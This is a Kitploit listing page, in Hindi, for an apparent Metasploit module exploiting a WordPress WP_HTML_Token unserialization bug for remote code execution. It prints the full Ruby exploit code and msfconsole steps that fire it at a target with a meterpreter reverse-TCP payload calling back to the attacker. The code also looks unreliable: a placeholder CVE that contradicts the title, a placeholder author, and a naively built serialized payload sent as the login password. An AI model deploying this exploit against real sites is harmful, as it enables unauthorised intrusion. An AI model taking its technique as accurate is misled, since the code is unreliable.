Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
-CVE-2024-31211 — Metasploit मॉड्यूल जो WP_HTML_Token में WordPress unserialization भेद्यता (CVE-2024-31211) का शोषण करके दूरस्थ कोड निष्पादन प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/abdurahmon3236/-cve-2024-31211
शोषण फ्रेमवर्कभेद्यता विश्लेषणकोड विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubabdurahmon3236/-cve-2024-31211

-CVE-2024-31211

Metasploit मॉड्यूल जो WP_HTML_Token में WordPress unserialization भेद्यता (CVE-2024-31211) का शोषण करके दूरस्थ कोड निष्पादन प्राप्त करता है।

रिपॉजिटरी देखें
152 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WP_HTML_Token वर्ग के इंस्टेंसेस के अनसीरियलाइज़ेशन के माध्यम से वर्डप्रेस में RCE कमजोरी का शोषण करने वाला मेटास्प्लॉइट मॉड्यूल बनाने के लिए, हम एक पेलोड तैयार करने पर ध्यान केंद्रित करेंगे जो अनसीरियलाइज़ेशन दोष को ट्रिगर करता है, जिससे मनमाना कोड निष्पादन होता है।

मेटास्प्लॉइट मॉड्यूल

निम्नलिखित कोड को अपने मेटास्प्लॉइट फ्रेमवर्क इंस्टॉलेशन की modules/exploits/multi/http निर्देशिका में wordpress_wp_html_token_rce.rb के रूप में सहेजें।

root@kitploit:~
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP_HTML_Token Unserialization RCE',
      'Description'    => %q{
        This module exploits a remote code execution vulnerability in WordPress via
        the unserialization of instances of the `WP_HTML_Token` class. This allows for
        code execution via its `__destruct()` magic method.
      },
      'Author'         =>
        [
          'Your Name'  # OneArch
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2024-XXXX'],  # Replace with the correct CVE number
          ['URL', 'https://example.com/advisory']  # Replace with an advisory link if available
        ],
      'DisclosureDate' => 'Aug 03 2024',
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [
        ['WordPress <= 5.x', { }]
      ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'Payload'        =>
        {
          'BadChars' => "\x00",
        }
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, "The base path to the WordPress installation", '/']),
      ])
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'wp-login.php'),
    })

    if res && res.code == 200 && res.body.include?('wp-login.php')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Sending payload to trigger unserialization vulnerability")

    serialized_payload = 'O:13:"WP_HTML_Token":1:{s:13:"__destruct";s:' + payload.encoded.length.to_s + ':"' + payload.encoded + '";}'

    post_data = {
      'user_login' => Rex::Text.rand_text_alphanumeric(8..12),
      'user_pass'  => serialized_payload,
      'wp-submit'  => 'Log In',
      'redirect_to' => normalize_uri(target_uri.path, 'wp-admin/'),
      'testcookie' => 1
    }

    send_request_cgi({
      'method'  => 'POST',
      'uri'     => normalize_uri(target_uri.path, 'wp-login.php'),
      'vars_post' => post_data
    })

    handler
  end
end

उपयोग निर्देश

  1. मॉड्यूल सहेजें: मॉड्यूल को अपने मेटास्प्लॉइट फ्रेमवर्क इंस्टॉलेशन की modules/exploits/multi/http निर्देशिका में wordpress_wp_html_token_rce.rb के रूप में सहेजें।

    root@kitploit:~
    /path/to/metasploit-framework/modules/exploits/multi/http/wordpress_wp_html_token_rce.rb
    
  2. मेटास्प्लॉइट लोड करें: एक टर्मिनल खोलकर और निम्नलिखित चलाकर मेटास्प्लॉइट फ्रेमवर्क शुरू करें:

    root@kitploit:~
    msfconsole
    
  3. नए मॉड्यूल का उपयोग करें: मेटास्प्लॉइट कंसोल में, निम्नलिखित कमांड का उपयोग करके नए एक्सप्लॉइट मॉड्यूल को लोड करें:

    root@kitploit:~
    use exploit/multi/http/wordpress_wp_html_token_rce
    
  4. कॉन्फ़िगर करें और चलाएँ: RHOSTS, RPORT, TARGETURI, और PAYLOAD जैसे आवश्यक विकल्प सेट करें। फिर मॉड्यूल चलाएँ।

    root@kitploit:~
    msf6 > use exploit/multi/http/wordpress_wp_html_token_rce
    msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set RHOSTS target_ip
    RHOSTS => target_ip
    msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set TARGETURI /
    TARGETURI => /
    msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set PAYLOAD php/meterpreter/reverse_tcp
    PAYLOAD => php/meterpreter/reverse_tcp
    msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LHOST your_ip
    LHOST => your_ip
    msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LPORT 4444
    LPORT => 4444
    msf6 exploit(multi/http/wordpress_wp_html_token_rce) > run
    

महत्वपूर्ण विचार

  • किसी भी सिस्टम का परीक्षण या शोषण करने से पहले सुनिश्चित करें कि आपके पास उचित अनुमतियाँ हैं।
  • यह मॉड्यूल शैक्षिक और परीक्षण उद्देश्यों के लिए डिज़ाइन किया गया है। किसी भी उत्पादन सिस्टम पर उपयोग करने से पहले हमेशा एक सुरक्षित और नियंत्रित वातावरण में परीक्षण करें।

यह मेटास्प्लॉइट मॉड्यूल एक कमजोर वर्डप्रेस इंस्टेंस पर एक क्राफ्टेड सीरियलाइज्ड पेलोड भेजता है, जो अनसीरियलाइज़ेशन कमजोरी को ट्रिगर करने और मनमाना कोड निष्पादन प्राप्त करने का प्रयास करता है। कमजोरी की विशिष्ट प्रकृति और लक्ष्य वातावरण के आधार पर पेलोड और मॉड्यूल को आवश्यकतानुसार समायोजित करें।

टूल डाउनलोड करें